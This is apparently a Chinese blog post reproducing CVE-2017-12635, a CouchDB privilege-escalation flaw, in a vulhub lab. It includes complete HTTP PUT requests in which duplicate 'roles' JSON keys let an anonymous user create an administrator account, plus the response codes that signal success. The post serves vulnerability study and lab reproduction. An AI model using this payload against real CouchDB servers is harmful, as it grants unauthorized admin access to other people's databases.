Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现

已于 2023-12-20 20:51:44 修改
阅读量1.3k 收藏 9
点赞数 23
分类专栏: apache漏洞合集-亲测 文章标签: apache couchdb 网络安全
于 2023-12-18 15:22:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135062142
版权

Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现

漏洞名称

漏洞描述

Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本

Apache CouchDB 1.7.0 / 2.x < 2.1.1

漏洞复现

环境搭建

vulhub链接

https://vulhub.org//#/environments/couchdb/CVE-2017-12635/

启动vulhub

docker-compose up -d

在这里插入图片描述

环境启动后,访问http://192.168.63.129:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。
在这里插入图片描述

漏洞利用

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

返回403错误,提示 {“error”:“forbidden”,“reason”:“Only _admin may set roles”},只有管理员才能设置Role角色
在这里插入图片描述

这个时候,我们利用 Erlang和JavaScript 处理 JSON 的特性,发送包含两个roles的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

在这里插入图片描述

验证是否成功

在这里插入图片描述

且在创建一个成功后,再重复发包,也会报错409,修改已创建的密码也不行
在这里插入图片描述

总结

在JavaScript在解析时会把"roles": [“_admin”],“roles”: [],解析为"roles": []用来检测创建角色的权限,其值为空,使用PUT方法上传时服务器时检测权限为空,即可绕过安全限制,并通过使用Erlang部分实现身份验证和授权,通过getter函数返回第一个值为:“roles”: [“_admin”],并创建具有管理员的用户wahaha:wahaha。如果攻击成功,在响应头中的状态码为201,且在响应体中返回org.couchdb.user字样,或在响应头中返回409状态码,在响应体中返回Document update conflict字样。

Bolgzhang
关注
  • 23
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 966
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
Couchdb 垂直权限绕过漏洞CVE-2017-12635
一枚不知名的Java程序猿
10-02 940
vulhub漏洞复现学习过程
CouchDB垂直越权漏洞CVE-2017-12635
Kevin's Blog
07-24 1814
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 访问环境五、防御措施 一、漏洞原理 二、触发条件 三、漏洞场景 / 挖掘思路 四、漏洞复现 4.1 漏洞环境 4.2 启动环境 4.3 访问环境 五、防御措施 ...
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1563
Couchdb 垂直权限绕过漏洞CVE-2017-12635
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
couchdb-docker:Apache CouchDB Docker
02-03
couchdb-docker:Apache CouchDB Docker
couchdb-fauxton:Apache CouchDB
02-03
福顿Fauxton是CouchDB的新Web UI。 要使其在您的计算机上的开发中运行。... 分叉此仓库(有关详细信息,请参见) 克隆你的叉子: git clone https://github.com/YOUR-USERNAME/couchdb-fauxton.git
apache-couchdb-2.3.1.msi
07-22
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母缩写,它反映了 CouchDB...
漏洞复现】vulhub couchdb/CVE-2017-12635
qq_46421742的博客
07-05 147
CouchDB(全称为Apache CouchDB)是一个开源的面向文档的数据库管理系统。它采用了基于文档的NoSQL模型,具有分布式、可扩展和高性能的特点。以下是一些关键特点和优势:文档存储:CouchDB以文档为核心,使用JSON格式存储数据。每个文档都有一个唯一的标识符(ID)和一个JSON格式的内容。这种存储方式使得数据的表示更加灵活和自由。分布式架构:CouchDB支持水平扩展,可以在多个节点上分布数据,实现负载均衡和高可用性。
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 367
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
vulhub漏洞复现-CouchDB(CVE-2017-12635/6)垂直越权漏洞远程代码执行
遇事不决冲冲冲
11-03 3457
CouchDB Apache CouchDB是一个开源的数据库,面向文档的数据库管理系统,专注易用性"完全使用Web"。使用JSON作为存储格式,JavaScript为查询语言,MapReduce和HTTP作为API的NoSQL数据库 CVE-2017-12635垂直越权漏洞 思路 由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。可用于非管理员用户赋予自身管理员身份权限。 在Erlang: > jiffy:decode(“{“a”:”1″, “a”:”2
Apache Couchdb 垂直权限绕过 CVE-2017-12635 漏洞复现
Senimo
07-16 448
CVE-2017-12635 Apache Couchdb 垂直权限绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC参考链接 一、漏洞描述 Apache CouchDB 是一个开源数据库,用Erlang实现。专注于易用性和成为“完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
最新发布
weixin_46239998的博客
01-01 810
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635CVE-2017-12636)
weixin_43072923的博客
05-24 1485
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
Couchdb 垂直权限绕过漏洞CVE-2017-12635复现
锋刃科技的博客
05-06 3248
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 6984 是自定义的端口。容器分别命名为 couchdb0、couchdb1 和 couchdb3。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值